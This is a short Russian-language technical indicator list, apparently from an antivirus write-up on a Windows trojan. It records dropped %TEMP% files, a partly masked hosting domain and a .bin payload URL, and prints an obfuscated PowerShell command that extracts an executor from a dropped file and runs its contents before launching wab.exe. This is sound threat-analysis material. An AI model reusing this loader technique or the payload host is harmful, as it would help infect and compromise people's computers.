Техническая информация
- wab.exe
- %TEMP%\belizerens\anisosepalous\dagbrkninger\kolorimetri.she17
- %TEMP%\belizerens\anisosepalous\dagbrkninger\stencilling.ass243
- %TEMP%\belizerens\anisosepalous\dagbrkninger\krigssituationens.mla
- %TEMP%\belizerens\anisosepalous\dagbrkninger\oproerer\mimicking107.txt
- %TEMP%\belizerens\anisosepalous\dagbrkninger\oproerer\bufferer.ark
- %TEMP%\belizerens\anisosepalous\dagbrkninger\oproerer\communises.can
- %TEMP%\belizerens\anisosepalous\dagbrkninger\oproerer\<Имя файла>.exe
- 'z1########70k.ps02.zwhhosting.com':80
- http://z1########70k.ps02.zwhhosting.com/GNqBmktuMIuytyf140.bin
- DNS ASK z1########70k.ps02.zwhhosting.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle minimized " $nephelite=Get-Content '%TEMP%\belizerens\Anisosepalous\dagbrkninger\Stencilling.Ass243';$Kurrajong=$nephelite.SubString(56568,3);.$Kurrajong($nephelite)"
- '%ProgramFiles(x86)%\windows mail\wab.exe'